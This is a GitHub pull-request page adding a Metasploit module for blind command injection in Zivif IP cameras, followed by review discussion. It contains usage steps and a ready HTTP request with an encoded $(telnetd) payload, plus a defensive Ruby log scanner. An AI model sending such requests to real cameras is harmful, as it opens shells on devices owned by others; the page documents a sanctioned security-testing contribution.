
Added exploit for CVE-2017-17106 #13170

Merged
merged 13 commits into from
Jun 16, 2020

Conversation

silascutler
Contributor

@silascutler silascutler commented Mar 29, 2020

Vulnerable Application
Zivif is a brand of consumer IP cameras. Version 2.3.4.2103 and prior are vulnerable to a remote command execution vulnerability - documented in CVE-2017-171069

This module exploits the RCE vulnerability in the web interface of these IP cameras. This is a blind RCE and the results of the command are not returned to the attacker.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/unix/http/zivif_ipcheck_exec
  • set RHOSTS <rhost>
  • set PAYLOAD cmd/unix/generic
  • set CMD <command>
  • exploit

In testing, running reboot as the issued <command> is a good way to do a quick validation. Alternatively, using telnetd will start Telnet on the vulnerable device.

An example HTTP request from this module is:

GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%24%28telnetd%29 HTTP/1.1
Host: <TARGET>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
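As an added example (not part of this PR or the Metasploit module), a small Ruby log scanner that shows how a defender would spot the request above in a camera's or reverse proxy's access log: it pulls the -url parameter out of every iptest.cgi request, percent-decodes it, and flags any value that is not a plain hostname, IP address or port. The log lines are constructed for the example.

```ruby
require 'cgi'

# Constructed sample access-log lines (not from the PR). Only the third line
# carries the URL-encoded $(...) in -url that the module's request uses.
SAMPLE_LOG = <<~LOG
  192.0.2.10 - - [29/Mar/2020:10:00:01 +0000] "GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=8.8.8.8 HTTP/1.1" 200 512
  192.0.2.11 - - [29/Mar/2020:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 2048
  198.51.100.7 - - [29/Mar/2020:10:00:03 +0000] "GET /cgi-bin/iptest.cgi?cmd=iptest.cgi&-time=1504225666237&-url=%24%28telnetd%29 HTTP/1.1" 200 512
LOG

# An IP-test target should only ever be a hostname, IP address or port; anything
# else in the decoded value (shell metacharacters, whitespace, quotes) is suspect.
ALLOWED_TARGET = /\A[A-Za-z0-9.\-:]+\z/

# Return the decoded -url value of an iptest.cgi request, or nil when the line
# is not an iptest.cgi request or has no -url parameter.
def iptest_url_param(line)
  m = line.match(%r{"(?:GET|POST) /cgi-bin/iptest\.cgi\?([^ "]*)})
  return nil unless m
  vals = CGI.parse(m[1]).fetch('-url', []) # CGI.parse percent-decodes the values
  vals.empty? ? nil : vals.first
end

# Classify one log line as :injection, :benign_iptest or :other.
def classify(line)
  target = iptest_url_param(line)
  return :other if target.nil?
  target.match?(ALLOWED_TARGET) ? :benign_iptest : :injection
end

# Return [client_ip, decoded -url] for every suspicious request in the log.
def find_injections(log)
  log.each_line
     .select { |line| classify(line) == :injection }
     .map { |line| [line.split(' ', 2).first, iptest_url_param(line)] }
end

if __FILE__ == $PROGRAM_NAME
  find_injections(SAMPLE_LOG).each { |ip, target| puts "#{ip} -> #{target.inspect}" }
end
```

The allowlist check is deliberately strict rather than a blocklist of metacharacters, so encodings the scanner did not anticipate still get flagged once decoded.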

silascutler and others added 6 commits March 30, 2020 11:35
@bwatters-r7
Contributor

Tests are failing for the following:

modules/exploits/unix/http/zivif_ipcheck_exec.rb - [ERROR] Incorrect disclosure date format
modules/exploits/unix/http/zivif_ipcheck_exec.rb:16 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:33 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:54 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:63 - [WARNING] Spaces at EOL
modules/exploits/unix/http/zivif_ipcheck_exec.rb:64 - [WARNING] Spaces at EOL

@bwatters-r7 bwatters-r7 added the needs-testing-environment PRs that need community testing and/or vulnerable test targets before they're able to be landed label Apr 2, 2020
@gwillcox-r7
Contributor

gwillcox-r7 commented Apr 22, 2020

@silascutler Looking online to try to source this camera. I can see that there are newer models, however the one listed as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module, as CVE-2017-171069 is not a valid CVE identifier; however CVE-2017-17106 is, and this is the one used in your PR title.

Looking around I can't see anyone selling this camera on Amazon, and the only people selling the older versions of these cameras I could find were on eBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.

Therefore at the moment it is looking like it will be very hard to source a PR115 camera to perform testing on. If you have any other cameras you have tested this out on and have confirmed that it works on I'd be open to hearing about them as we might be able to test those instead (would still require an update to the documentation to reflect this but at least then we will be able to land this PR and get your work into the framework).

@adfoster-r7 adfoster-r7 added needs-docs and removed needs-docs needs-testing-environment PRs that need community testing and/or vulnerable test targets before they're able to be landed labels May 4, 2020
@label-actions

label-actions bot commented May 4, 2020

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

@adfoster-r7 adfoster-r7 added the needs-testing-environment PRs that need community testing and/or vulnerable test targets before they're able to be landed label May 4, 2020
@label-actions

label-actions bot commented May 4, 2020

Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected.

We have been unable to test this module successfully. This may be due to software or hardware requirements we cannot replicate.

To help unblock this pull request, please:

  • Comment with links to documentation on how to set up an environment, and provide exact software version numbers to use
  • Or comment guided steps on how to set up our environment for testing this module
  • Or send pcaps/screenshots/recordings of it working - you can email us msfdev[at]rapid7.com

Once there's a clear path for testing and evaluating this module, we can progress with this further.

@silascutler
Contributor Author

> @silascutler Looking online to try to source this camera. I can see that there are newer models, however the one listed as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module, as CVE-2017-171069 is not a valid CVE identifier; however CVE-2017-17106 is, and this is the one used in your PR title.

I think the correct CVE should actually be CVE-2017-17105 - which covers the remote command injection (https://nvd.nist.gov/vuln/detail/CVE-2017-17105).

> Looking around I can't see anyone selling this camera on Amazon, and the only people selling the older versions of these cameras I could find were on eBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.
>
> Therefore at the moment it is looking like it will be very hard to source a PR115 camera to perform testing on. If you have any other cameras you have tested this out on and have confirmed that it works on I'd be open to hearing about them as we might be able to test those instead (would still require an update to the documentation to reflect this but at least then we will be able to land this PR and get your work into the framework).

Yep PR115 is still vulnerable. Also https://www.amazon.com/gp/product/B06Y5VTWC9/ref=ppx_yo_dt_b_search_asin_title?ie=UTF8&psc=1 . I also just ordered https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=zivif&qid=1589308250&s=electronics&sr=1-1 to verify on that device as well.

The original documentation of the exploit can be found: https://seclists.org/fulldisclosure/2017/Dec/42

@gwillcox-r7
Contributor

> > @silascutler Looking online to try to source this camera. I can see that there are newer models, however the one listed as being appears to be out of stock/discontinued: https://zivif.com/product/camera-pr115/. Also I presume you typo'd the CVE number in your description and your module, as CVE-2017-171069 is not a valid CVE identifier; however CVE-2017-17106 is, and this is the one used in your PR title.
>
> I think the correct CVE should actually be CVE-2017-17105 - which covers the remote command injection (https://nvd.nist.gov/vuln/detail/CVE-2017-17105).
>
> > Looking around I can't see anyone selling this camera on Amazon, and the only people selling the older versions of these cameras I could find were on eBay. Even then the two listings weren't the right model, see https://www.ebay.com/sch/i.html?_from=R40&_nkw=Zivif&_sacat=0&LH_TitleDesc=0&LH_PrefLoc=2. The one I did find, https://www.ebay.com/itm/NEW-Camera-4X-Motorized-Zoom-1080P-Bullet-Outdoor-Indoor-IP-Security-Camera/223546193423?hash=item340c64360f:g:~ygAAOSwo4Vc~ROQ, is available on Amazon for a much cheaper price: https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=SCNEW-08530&qid=1587528553&sr=8-1, but it is the wrong model and I'm not sure this would be very helpful for testing.
> >
> > Therefore at the moment it is looking like it will be very hard to source a PR115 camera to perform testing on. If you have any other cameras you have tested this out on and have confirmed that it works on I'd be open to hearing about them as we might be able to test those instead (would still require an update to the documentation to reflect this but at least then we will be able to land this PR and get your work into the framework).
>
> Yep PR115 is still vulnerable. Also https://www.amazon.com/gp/product/B06Y5VTWC9/ref=ppx_yo_dt_b_search_asin_title?ie=UTF8&psc=1 . I also just ordered https://www.amazon.com/Zivif-PoE-Camera-Motorized-Zoom/dp/B06Y5HGNDQ/ref=sr_1_1?dchild=1&keywords=zivif&qid=1589308250&s=electronics&sr=1-1 to verify on that device as well.
>
> The original documentation of the exploit can be found: https://seclists.org/fulldisclosure/2017/Dec/42

Hmm can't find any PR115's available online. The first link you posted on Amazon shows that they are out of stock but the second one might be interesting if it is still vulnerable as it seems those are still being sold.

@agalway-r7 agalway-r7 self-assigned this Jun 9, 2020
@agalway-r7
Contributor

@silascutler, we won't be able to get a camera that can test the module for a while, especially with COVID on the go. Would you be ok to either send us a Packet Capture of the module's successful execution, or hop on a call with myself and demo it? Either's good, so whatever suits you best.

@silascutler
Contributor Author

> @silascutler, we won't be able to get a camera that can test the module for a while, especially with COVID on the go. Would you be ok to either send us a Packet Capture of the module's successful execution, or hop on a call with myself and demo it? Either's good, so whatever suits you best.

Yes, I'll email you

@agalway-r7
Contributor

@silascutler, do you have the module set to executable on your machine? Getting a Module should not be executable (+x) error on the Travis build

@silascutler
Contributor Author

> @silascutler, do you have the module set to executable on your machine? Getting a Module should not be executable (+x) error on the Travis build

I have the local repo on a shared drive. I think it's not properly preserving the flag

Contributor Author

@silascutler silascutler left a comment


Updated PR based on feedback.

Removed single space at the end of line 44
Contributor Author

@silascutler silascutler left a comment


Fixed for travis-ci

Contributor

@agalway-r7 agalway-r7 left a comment


Looks good, will land it ASAP. Good work @silascutler 👍

@agalway-r7 agalway-r7 added docs and removed needs-docs needs-testing-environment PRs that need community testing and/or vulnerable test targets before they're able to be landed labels Jun 16, 2020
@agalway-r7
Contributor

agalway-r7 commented Jun 16, 2020

Release Notes

The Zivif Camera iptest.cgi Blind Remote Command Execution module exploits a vulnerability in the Web Interface of Zivif brand IP cameras of version 2.3.4.2103 and below, facilitating blind RCE.

@agalway-r7 agalway-r7 added the rn-modules release notes for new or majorly enhanced modules label Jun 16, 2020
@agalway-r7 agalway-r7 merged commit 2c4d158 into rapid7:master Jun 16, 2020
Labels
docs module rn-modules release notes for new or majorly enhanced modules